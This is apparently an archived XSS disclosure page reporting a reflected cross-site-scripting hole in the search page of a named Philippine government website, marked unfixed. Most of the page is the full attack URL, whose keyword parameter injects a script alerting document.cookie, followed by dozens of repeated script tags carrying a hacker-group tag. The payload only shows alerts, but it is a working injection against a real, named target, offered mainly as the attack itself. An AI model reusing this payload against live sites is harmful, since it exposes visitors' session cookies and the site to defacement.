Advertisements:
Security researcher Pin0yeXpl0itTeam, has submitted on 03/08/2010 a cross-site-scripting (XSS) vulnerability affecting www.citem.gov.ph, which at the time of submission ranked 1341138 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 24/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Date submitted: 03/08/2010 Date published: 24/12/2011 Fixed? Mail us!Status:  UNFIXED
Author: Pin0yeXpl0itTeam Domain: www.citem.gov.ph Category: XSS Pagerank: 1341138
URL: http://www.citem.gov.ph/catalogonline/main/search.php?keyword=%3Cscript%3Ealert%28document.cookie%29
%3C/script%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~::::::
:[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTea
m%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3
Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~
~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%2
0~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20P
in0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT
%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat91
12]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20
%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/
XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.sourc
e%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~::
:::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0i
tTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRI
PT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]:::::::
:~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%
20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By
%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SC
RIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redh
at9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%2
0%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert
%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.s
ource%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~
~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeX
pl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3C
SCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]:::
:::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20
%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%
20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3
C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[
Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%
20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ea
lert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~
~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~
~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin
0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3
E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112
]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%2
0%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XS
Sed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%
29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~::::
:::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itT
eam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT
%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~
~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20
%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%2
0Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRI
PT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat
9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%
20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%2
8/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.sou
rce%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~
:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl
0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSC
RIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]:::::
:::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%2
0%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20
By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/
SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Re
dhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20
%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Eale
rt%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/
.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~
~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0y
eXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%
3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]:
:::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%
20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSe
d%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29
%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~::::::
:[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTea
m%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3
Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~
~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%2
0~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20P
in0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT
%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat91
12]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20
%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/
XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.sourc
e%29%3C/SCRIPT%3E&searchtype=1&submit=+GO+
Click here to view the mirror
Buy XSS Attacks book from Amazon!
XSS Attacks
Cross Site Scripting Exploits and Defense
Buy Detecting Malice book from RSnake
Website Fraud Loss Prevention
Advertisements
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.